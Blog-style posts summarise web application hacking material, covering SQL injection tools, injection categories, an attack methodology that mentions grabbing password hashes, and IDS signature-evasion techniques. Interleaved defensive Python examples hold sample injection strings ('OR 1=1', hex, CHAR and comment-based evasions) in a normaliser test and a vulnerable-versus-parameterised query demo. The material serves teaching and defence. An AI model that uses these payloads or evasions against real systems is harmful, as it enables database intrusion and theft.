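Two of the spider features listed above, cookie-aware crawling and the session-dependence test (fetch each page with and without the received cookies and compare), are simple enough to show end to end, and they are the same check a defender runs to verify that nothing sensitive is reachable without a session. The following is an added example, not from the post or the book it quotes and not any of the three suites' code: it crawls a constructed in-memory application (a dictionary standing in for a live site, with a `fetch` stub in place of real HTTP) and reports which pages differ between the authenticated and anonymous requests. All paths, page bodies and the session token are constructed for this example.

```python
# Added example: cookie-aware spider with a session-dependence check over a fake site.
from html.parser import HTMLParser

# Constructed in-memory application: path -> (html body, requires_session)
SITE = {
    "/": ("<a href='/about'>About</a> <a href='/login'>Login</a> "
          "<a href='/account'>My account</a>", False),
    "/about": ("<p>About us</p>", False),
    "/login": ("<form action='/login' method='post'></form>", False),
    "/account": ("<p>Welcome back</p> <a href='/account/orders'>Orders</a>", True),
    "/account/orders": ("<p>Your orders</p>", True),
}
VALID_SESSION = {"session": "constructed-session-token"}


def fetch(path, cookies):
    """Stand-in for an HTTP GET against the fake site; returns (status, body)."""
    if path not in SITE:
        return 404, "<p>Not found</p>"
    body, requires_session = SITE[path]
    if requires_session and cookies.get("session") != VALID_SESSION["session"]:
        return 302, "<p>Redirecting to /login</p>"
    return 200, body


class LinkExtractor(HTMLParser):
    """Collect same-site (root-relative) hrefs from anchor tags."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value and value.startswith("/"):
                    self.links.append(value)


def spider(start, cookies):
    """Breadth-first crawl with the session cookie. Every page is also requested
    without cookies; a page is session-dependent when the two responses differ."""
    queue, seen, report = [start], set(), {}
    while queue:
        path = queue.pop(0)
        if path in seen:
            continue
        seen.add(path)
        status_auth, body_auth = fetch(path, cookies)
        status_anon, body_anon = fetch(path, {})
        report[path] = {
            "status": status_auth,
            "session_dependent": (status_auth, body_auth) != (status_anon, body_anon),
        }
        if status_auth == 200:                 # only parse pages we actually got
            parser = LinkExtractor()
            parser.feed(body_auth)
            queue.extend(link for link in parser.links if link not in seen)
    return report


if __name__ == "__main__":
    for path, info in sorted(spider("/", VALID_SESSION).items()):
        print(f"{path:18} {info['status']}  session-dependent={info['session_dependent']}")
```

On a real site the comparison has to ignore volatile content (timestamps, CSRF tokens, the session-specific parts of a page) before declaring two responses equal, otherwise every page looks session-dependent; the suites listed above do that normalisation for you.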





Application Fuzzers and Scanners
While it is possible to perform a successful attack using only manual techniques, to become a truly accomplished web application hacker, you need to make use of automation in your attacks, to enhance their speed and effectiveness. 

The following features are implemented in the different tool suites:

>> Automated scans to detect common vulnerabilities.

>> Manually configured scanning for common vulnerabilities.

>> A set of built-in attack payloads and versatile functions to generate arbitrary payloads in user-defined ways — for example, based on malformed encoding, character substitution, brute force, data retrieved in a previous attack, and so on.

>> Ability to save scan response data to use in reports or incorporate into further attacks.

>> Customizable functions for viewing and analyzing responses — for example, based on the appearance of specific expressions or the attack payload itself.

>> Functions for extracting useful data from the application’s responses — for example, by parsing out the username and password fields in a My Details page.

>> Functions for analyzing cookies and other tokens for any sequences.



Thursday, January 2, 2020

SQL Injection Tools

There are many tools; the following are discussed here:

BSQL Hacker is an automated SQL injection tool designed to exploit SQL injection vulnerabilities in virtually any database.

Havij is an automated SQL injection tool that helps penetration testers to find and exploit SQL injection vulnerabilities on a web page.

Marathon Tool lets a malicious user send heavy queries to perform a time-based blind SQL injection attack.

SQL Queries

SQL is a domain-specific language used in programming and designed for managing data held in a relational database management system, or for stream processing in a relational data stream management system.
How an SQL Query Works
An injected SQL query will be executed on the server and answered in the response. For example:

SELECT * FROM [Orders]


This command will reveal all information stored in the "Orders" table of the database. If an organization keeps records of its orders in a database, all information held in that table will be extracted by the command.

SQL Delete Query
The DELETE statement is used to delete existing records in a table. To understand it, consider a table “Customers” in a database. The following is the information contained in the table “Customers”:
[Table: contents of the “Customers” table]
[Screenshot: an attacker performing an SQL injection attack on a website, and the information the attack returns]
===================================
For Android
===================================
Tools
[Tool list]
This is the most useful set of tools, which I use personally.
==================================
Finally, we look at some evasion techniques.
Evading IDS
In order to secure a database, isolated deployment in a secure network location with an intrusion detection system (IDS) is recommended. The IDS keeps monitoring the network and host traffic as well as the database application. An attacker has to evade the IDS to access the database, and uses different evasion techniques to do so. For example, an IDS using signature-based detection compares input strings against its signatures to detect intrusion, so the attacker's task is to evade signature-based detection.

Types of Signature Evasion Techniques
  • In-line Comments
  • Char Encoding
  • String Concatenation
  • Obfuscated Code
  • Manipulating White Spaces
  • Hex Encoding
  • Sophisticated Matches
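Every technique in the list above works against a signature engine that matches the raw input, and the defender's answer is to normalise the input first (decode, strip comments, fold encodings, collapse whitespace, lower-case) and only then apply the signatures. The following is an added example, not from the post or the CEH material it summarises and not any particular IDS's logic, of such a normalising pre-processor with three simple signatures. The sample inputs, one per listed technique plus a benign value containing an apostrophe, are constructed for this example; the hex literal and CHAR() handling follows the MySQL/MSSQL forms and is an assumption about the dialect.

```python
# Added example: normalise input before signature matching so the listed
# evasion techniques no longer hide the same payload.
import re
from urllib.parse import unquote

# Constructed samples, one per evasion technique listed above.
SAMPLES = {
    "plain": "' OR 1=1 --",
    "inline_comment": "'/**/OR/**/1=1/**/--",
    "url_encoded": "%27%20OR%201%3D1%20--",
    "double_url_encoded": "%2527%2520OR%25201%253D1%2520--",
    "char_encoding": "' OR CHAR(49)=CHAR(49) --",
    "hex_encoding": "' OR 0x31=0x31 --",
    "string_concat": "' OR 'ab'='a'||'b' --",
    "whitespace": "'\tOR\n\n1 = 1 --",
    "mixed_case": "' oR 1=1 --",
    "benign": "O'Reilly",
}


def normalize(value):
    """Fold the encodings an attacker can choose into one canonical form."""
    s = value
    for _ in range(3):                                   # undo repeated URL encoding
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)         # in-line comments act as spaces
    s = re.sub(r"\bchar\((\d+)\)", lambda m: chr(int(m.group(1))), s, flags=re.I)
    s = re.sub(r"\b0x((?:[0-9a-f]{2})+)\b",               # hex literal -> its bytes
               lambda m: bytes.fromhex(m.group(1)).decode("latin-1"), s, flags=re.I)
    s = re.sub(r"'\s*(?:\|\||\+)\s*'", "", s)            # 'a'||'b' / 'a'+'b' -> 'ab'
    s = re.sub(r"\s+", " ", s).strip().lower()           # whitespace and case
    return s


# Signatures are written against the normalised form only.
SIGNATURES = {
    "tautology": re.compile(r"'\s*or\s+('?\w+'?)\s*=\s*\1"),   # ' or X=X
    "comment_terminator": re.compile(r"(--|#)\s*$"),
    "union_select": re.compile(r"\bunion\b.+\bselect\b"),
}


def detect(raw):
    """Names of the signatures that match after normalisation."""
    canonical = normalize(raw)
    return [name for name, pattern in SIGNATURES.items() if pattern.search(canonical)]


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:20} {normalize(raw)!r:28} -> {detect(raw)}")
```

Normalisation is what turns a list of evasions into a single detection problem; the remaining gap is dialect-specific syntax the normaliser does not know, which is why the durable fix is parameterised queries in the application rather than ever more signatures in front of it.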









Wednesday, January 1, 2020

SQL Injection

A.o.A

" SQL Injection"


SQL
SQL stands for Structured Query Language; here, SQL injection is covered.
SQL injection is basically the insertion of malicious code or script by exploiting vulnerabilities to launch an attack powered by back-end components.
SQL injection is a popular and complex method of attack on web services, applications, and databases.
It requires deep knowledge of web application processes and their components, such as databases and SQL.
SQL injection attacks target websites or web applications that use SQL. They rely on the strategic injection of malicious code or script into existing queries.
SQL injection is a powerful and dangerous attack. It identifies the flaws and vulnerabilities in a website or application.
[Figure: SQL injection vulnerability]

Types of SQL Injection
SQL injection can be classified into three major categories:

In-band SQLi

In-band SQL injection is a category which includes injection techniques using the same communication channel to launch the injection attack and gather information from the response. In-band injection techniques include:

Error-based SQL injection
Union-based SQL injection



Inferential SQLi

In an inferential SQL injection, no data is transferred from the web application. The attacker is unable to see the result of an attack, hence it is referred to as a blind injection.


Out-of-band SQLi

Out-of-band SQL injection is the injection technique that uses different channels to launch the injection and gather the responses. It requires some features to be enabled, such as DNS or HTTP requests, on the database server; hence it is not very common.

SQL Injection Methodology

>Information Gathering and SQL Injection Vulnerability Detection
>Launch SQL Injection Attacks
>Advanced SQL Injection
In the information gathering phase, collect information about the web application, operating system, database, and the structure of the components. Evaluating the extracted information will help to identify the vulnerabilities to exploit. Information can be gathered using different tools and techniques, such as injecting code into the input fields to observe the response of error messages. Evaluation of input fields, hidden fields, GET and POST requests, cookies, string values, and detailed error messages can reveal enough information to initiate an injection attack.


An appropriate SQL injection attack from the categories above can be initiated just after gathering the information about the structure of the database and the vulnerabilities found. By exploiting them, the injection can be successful. SQL injection attacks such as union SQL injection, error-based SQL injection, blind SQL injection and others can be used to extract information from the database, such as the database name, tables, columns, rows, and fields. The injection can also be intended to bypass authentication.


Advanced SQL injection may include enumeration of databases such as MySQL, MSSQL, MS Access, Oracle, DB2, or PostgreSQL, and of tables and columns, in order to identify the privilege level of users, account information of the database administrator, and the database structure. It also includes grabbing passwords and hashes, and transferring the database to a remote machine.
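The root cause behind every category above (in-band, inferential, out-of-band) is the same: user input is concatenated into the text of the query, so it can change the query's structure. The following is an added example, not from the post or the CEH material it summarises, that shows the defect and the fix side by side against an in-memory SQLite database using the “Customers” table named earlier on the page; the column layout, the rows and the probe value are constructed for this example.

```python
# Added example: string-built query (injectable) vs. parameterised query (safe).
import sqlite3


def build_db():
    """Constructed 'Customers' table with three rows in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Customers (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO Customers (name, email) VALUES (?, ?)",
        [("alice", "alice@example.com"), ("bob", "bob@example.com"), ("carol", "carol@example.com")],
    )
    conn.commit()
    return conn


def find_customer_vulnerable(conn, name):
    """The input is pasted into the SQL text, so it can rewrite the WHERE clause."""
    query = f"SELECT name, email FROM Customers WHERE name = '{name}'"
    return conn.execute(query).fetchall()


def find_customer_safe(conn, name):
    """The input is bound as a parameter; the driver never treats it as SQL."""
    return conn.execute(
        "SELECT name, email FROM Customers WHERE name = ?", (name,)
    ).fetchall()


def demo():
    conn = build_db()
    probe = "x' OR '1'='1"   # constructed tautology input of the in-band kind
    return {
        "vulnerable_rows": len(find_customer_vulnerable(conn, probe)),  # whole table leaks
        "safe_rows": len(find_customer_safe(conn, probe)),              # no such customer
        "normal_lookup": find_customer_safe(conn, "alice"),
    }


if __name__ == "__main__":
    print(demo())
```

The parameterised form is the fix regardless of database vendor; input validation and the IDS normalisation discussed under "Evading IDS" are defence in depth, not substitutes, because they have to anticipate every encoding while binding parameters removes the ambiguity entirely.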

Testing of SQL Injection









